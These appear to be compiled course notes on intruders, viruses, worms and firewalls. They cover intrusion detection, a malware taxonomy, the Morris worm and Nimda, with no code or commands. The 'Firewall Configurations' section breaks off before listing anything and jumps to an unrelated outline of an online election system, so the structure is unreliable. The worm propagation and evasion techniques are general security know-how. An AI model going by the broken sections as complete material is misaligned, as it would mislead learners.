Intruders, Viruses, & Firewalls

Understanding Intruders, Viruses, & Firewalls

Safeguarding Your Digital Environment
Introduction to Intruders
Intruders
• Definition: Individuals or automated programs
attempting unauthorized access to systems or networks.
• Methods: Phishing, malware, social engineering.
• Impact: Data theft, system disruption, unauthorized
access.

Understanding Viruses: Viruses

 Definition: Malicious software programs replicating and
infecting other files or systems.
 Types: File viruses, macro viruses, boot sector viruses.
 Spread: Email attachments, infected websites, software
downloads.
Risks of Intruders and Viruses: Risks
• Data Loss: Confidential information compromised.
• System Disruption: Downtime and loss of productivity.
• Identity Theft: Personal and financial information
exposed.
• Visual: Graph showing the increase in cyber security
incidents due to intruders and viruses.
Introduction to Firewalls: Firewalls
 Definition: Network security devices/software
controlling traffic based on predefined rules.
 Purpose: Prevent unauthorized access, block malicious
traffic, enforce security policies.
 Types: Hardware appliances, software programs, cloud-
based services.
Functionality of Firewalls: Firewall Functionality
 Traffic Filtering: Based on IP addresses, port numbers,
protocols.
 Intrusion Detection: Identify and respond to suspicious
activity.
 Application Awareness: Control access to specific
applications.
Types of Firewalls
o Network Firewalls: Control traffic between networks.
o Host-based Firewalls: Installed on individual devices.
o Next-Generation Firewalls (NGFWs): Advanced features
for enhanced protection.
Importance of Firewalls: Importance
• Protect Against Intruders and Viruses: Block malicious
traffic.
• Safeguard Sensitive Data: Prevent unauthorized access.
• Enforce Security Policies: Control network access and
behavior.
Best Practices for Security: Best Practices
 Install and Configure Firewalls: Tailored to organizational
needs.
 Update Regularly: Keep software and definitions up to
date.
 Educate Users: Train employees on cyber security
awareness.
Conclusion

• Intruders seek unauthorized access, viruses infect

systems, firewalls protect networks.

• Importance: Implementing robust security measures

is essential.

• Call to Action: Enhance cybersecurity measures to

safeguard digital assets.

Intrusion Detection:
Inevitably, the best intrusion prevention system will fail. A system's second line of defense is
intrusion detection, and this has been the focus of much research in recent years. This
interest is motivated by a number of considerations, including the following:
• If an intrusion is detected quickly enough, the intruder can be identified and ejected from
the system before any damage is done or any data are compromised.
• Effective intrusion detection system can serve as a deterrent, so acting to prevent
intrusions.
• Intrusion detection enables the collection of information about intrusion techniques that
can be used to strengthen the intrusion prevention facility.
Approaches to intrusion detection:
1. Statistical anomaly detection: Involves the collection of data relating to the behavior of
legitimate users over a period of time.
 Then statistical tests are applied to observed behavior to determine with a high level
of confidence whether that behavior is not legitimate user behavior.
 Threshold detection: This approach involves defining thresholds, independent of user, for
the frequency of occurrence of various events.
 Profile based: A profile of the activity of each user is developed and used to detect
changes in the behavior of individual accounts.
2. Rule-based detection: Involves an attempt to define a set of rules that can be used to
decide that a given behavior is that of an intruder.
• Anomaly detection: Rules are developed to detect deviation from previous usage patterns.
• Penetration identification: An expert system approach that searches for suspicious
behavior.
 Statistical anomaly detection is effective against masqueraders, who are unlikely to mimic
the behavior patterns of the accounts they appropriate.
Audit Records:-A fundamental tool for intrusion detection is the audit record.
Basically, two plans are used:
Native audit records: Virtually all multiuser operating systems include accounting software
that collects information on user activity.
The advantage of using this information is that no additional collection software is needed.
The disadvantage is that the native audit records may not contain the needed information or
may not contain it in a convenient form.
Detection-specific audit records: A collection facility can be implemented that generates
audit records containing only that information required by the intrusion detection system.
• One advantage of such an approach is that it could be made vendor independent and
ported to a variety of systems.
• The disadvantage is the extra overhead involved in having, in effect, two accounting
packages running on a machine.
Name Description
Virus Attaches itself to a program and propagates copies of itself to other
programs

Worm Program that propagates copies of itself to

other computers
Logic bomb Triggers action when condition occurs
Trojan horse Program that contains unexpected
additional functionality
Backdoor (trapdoor) Program modification that allows
unauthorized access to functionality
Exploits Code specific to a single vulnerability or
set of vulnerabilities
Downloaders Program that installs other items on a
machine that is under attack. Usually, a downloader is sent in an e-mail.
Auto-rooter Malicious hacker tools used to break into
new machines remotely
Kit (virus generator) Set of tools for generating new viruses
automatically
Spammer programs Used to send large volumes of unwanted
e-mail
Flooders Used to attack networked computer
systems with a large volume of traffic to carry out a denial of service (DoS) attack

Keyloggers Captures keystrokes on a compromised

system
Rootkit Set of hacker tools used after attacker has
broken into a computer system and gained root-level access
Zombie Program activated on an infected machine
that is activated to launch attacks on other machines
During its lifetime, a typical virus goes through the following four phases:
Dormant phase: The virus is idle. The virus will eventually be activated by some event, such
as a date, the presence of another program or file, or the capacity of the disk exceeding
some limit. Not all viruses have this stage.
Propagation phase: The virus places an identical copy of itself into other programs or into
certain system areas on the disk.
• Each infected program will now contain a clone of the virus, which will itself enter a
propagation phase.
Triggering phase: The virus is activated to perform the function for which it was intended.
As with the dormant phase, the triggering phase can be caused by a variety of system
events, including a count of the number of times that this copy of the virus has made copies
of itself.
Execution phase: The function is performed. The function may be harmless, such as a
message on the screen, or damaging, such as the destruction of programs and data files.
Introduction:-A worm is a program that can replicate itself and send copies from computer to
computer across network connections.
The worm may be activated to replicate and propagate again. In addition to propagation, the
worm usually performs some unwanted function.
An e-mail virus has some of the characteristics of a worm, because it propagates itself from
system to system.
Network worm programs use network connections to spread from system to system.
Once active within a system, a network worm can behave as a computer virus or bacteria, or it
could implant Trojan horse programs or perform any number of disruptive or destructive
actions.
Examples include the following:
Electronic mail facility: A worm mails a copy of itself to other systems.
Remote execution capability: A worm executes a copy of itself on another system.
Remote login capability: A worm logs onto a remote system as a user and then uses
commands to copy itself from one system to the other.
 A network worm exhibits the same characteristics as a computer virus: a dormant phase, a
propagation phase, a triggering phase, and an execution phase. The propagation phase
generally performs the following functions:
1. Search for other systems to infect by examining host tables or similar repositories of
remote system addresses.
2. Establish a connection with a remote system.
3. Copy itself to the remote system and cause the copy to be run.
State of Worm Technology
The state of the art in worm technology includes the following:
Multiplatform: Newer worms are not limited to Windows machines but can attack a variety of
platforms, especially the popular varieties of UNIX.
Multiexploit: New worms penetrate systems in a variety of ways, using exploits against Web
servers, browsers, e-mail, file sharing, and other network-based applications.
Ultrafast spreading: One technique to accelerate the spread of a worm is to conduct a prior
Internet scan to accumulate Internet addresses of vulnerable machines.
Polymorphic: To evade detection, skip past filters, and foil real-time analysis, worms adopt
the virus polymorphic technique. Each copy of the worm has new code generated on the fly
using functionally equivalent instructions and encryption techniques.
Metamorphic: In addition to changing their appearance, metamorphic worms have a
repertoire of behavior patterns that are unleashed at different stages of propagation.
Transport vehicles: Because worms can rapidly compromise a large number of systems, they
are ideal for spreading other distributed attack tools, such as distributed denial of service
zombies.
Zero-day exploit: To achieve maximum surprise and distribution, a worm should exploit an
unknown vulnerability that is only discovered by the general network community when the
worm is launched.
The Morris Worm
The Morris worm was designed to spread on UNIX systems and used a number of different
techniques for propagation.
It attempted to log on to a remote host as a legitimate user. In this method, the worm first
attempted to crack the local password file, and then used the discovered passwords and
corresponding user IDs. The assumption was that many users would use the same password
on different systems. To obtain the passwords, the worm ran a password- cracking program
that tried
 Each user's account name and simple permutations of it
 A list of 432 built-in passwords that Morris thought to be likely candidates
 All the words in the local system directory
It exploited a bug in the finger protocol, which reports the whereabouts of a remote user.
It exploited a trapdoor in the debug option of the remote process that receives and sends
mail.
If any of these attacks succeeded, the worm achieved communication with the operating
system command interpreter.
Recent Worm Attacks In late 2001, a more versatile worm appeared, known as Nimda. Nimda
spreads by multiple mechanisms:
 from client to client via e-mail
 from client to client via open network shares
 from Web server to client via browsing of compromised Web sites
 from client to Web server via active scanning for and exploitation of various Microsoft.
Firewall Configurations:
Description:-The three common firewall configurations:-
Virtual Elections System Architecture:
User Interface:
Voter Interface: A secure and user-friendly interface for voter registration, authentication,
and casting votes. This could be a web application or a mobile app.
Frontend:
Voter Registration Module: Allows users to register as voters by providing necessary
information.
Candidate Registration Module: Enables individuals to register as candidates for different
positions.
Authentication and Authorization:
User Authentication: Secure authentication mechanisms to ensure the identity of voters
and candidates.
Authorization: Role-based access control to manage permissions for different user roles.
Voting System:
Secure Voting Module: Provides a platform for voters to cast their votes securely. This
should include cryptographic methods to ensure the integrity and confidentiality of votes.
Voting Period Management: Controls the timing of the election phases, such as the
campaign period and the actual voting period.
Candidate Management:
Candidate Dashboard: Allows candidates to manage their campaign information, monitor
progress, and view results.
Campaign Period Control: Manages the timeline for candidate campaigns.
Back-end Server: User Management: Manages voter and candidate data, including registration
details and authentication.
Vote Management: Collects, stores, and processes votes securely.
Results Calculation: Calculates and verifies election results.
Security Measures: Implements security protocols to protect against attacks, including
encryption, firewalls, and intrusion detection systems.
Database: Voter Database: Stores information about registered voters.
Candidate Database: Stores information about candidates.
Vote Database: Securely stores cast votes with proper encryption.
Blockchain Integration (Optional):
Distributed Ledger:Provides an immutable record of votes to enhance transparency & integrity.
Smart Contracts: Automates certain aspects of the election process, such as vote counting.
External Systems Integration:
Identity Verification Services: Integrates with identity verification services for additional
authentication.
Notification Services: Sends notifications to users about important events in the election
process.
Security Measures: SSL/TLS Encryption: Ensures secure communication between clients &
servers.
Multi-Factor Authentication (MFA): Adds an extra layer of security for user authentication.
Regular Security Audits: Conducts regular security audits and vulnerability assessments.
Results Presentation:
Results Dashboard: Displays election results to the public in real-time (if permissible) or after
the voting period ends.
Audit Trail:
Audit Logging: Maintains detailed logs of all activities for auditing purposes.
Compliance and Regulations:
Compliance Module: Ensures that the virtual election system complies with relevant electoral
laws and regulations.
Disaster Recovery and Redundancy:
Data Backup: Regularly backs up critical data to prevent data loss.
Redundancy: Implements redundant systems to ensure continuous operation in case of
system failures.